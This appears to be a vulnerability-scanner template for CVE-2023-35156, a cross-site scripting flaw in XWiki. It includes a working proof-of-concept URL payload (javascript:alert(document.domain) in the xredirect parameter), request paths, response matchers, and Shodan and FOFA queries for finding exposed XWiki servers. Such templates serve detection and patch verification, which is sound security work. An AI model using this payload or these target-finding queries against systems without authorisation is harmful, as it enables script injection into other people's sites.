id: CVE-2023-35156 info: name: XWiki >= 6.0-rc-1 - Cross-Site Scripting author: ritikchaddha severity: medium description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: > xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.0-rc-1. impact: | Successful exploitation could lead to cross-site scripting. remediation: | This vulnerability has been patched in XWiki 14.10.6,15.1. reference: - https://jira.xwiki.org/browse/XWIKI-20341 - https://nvd.nist.gov/vuln/detail/CVE-2023-35156 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-35156 cwe-id: CWE-79 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss http: - method: GET path: - "{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)" - "{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - 'cancel" href="javascript:alert(document.domain)' - type: word part: header words: - 'text/html' - type: status status: - 200 - 401 # digest: 4a0a004730450220731174791ebb3c8d2b5bb67d9220d3471fdc81d65c3694cc57368c0d4f864f9a022100f50ace80529d0d7010f9abf1de8592756e345b3141c94d52d1ab4f5dde3c7c72:922c64590222798bb761d5b6d8e72950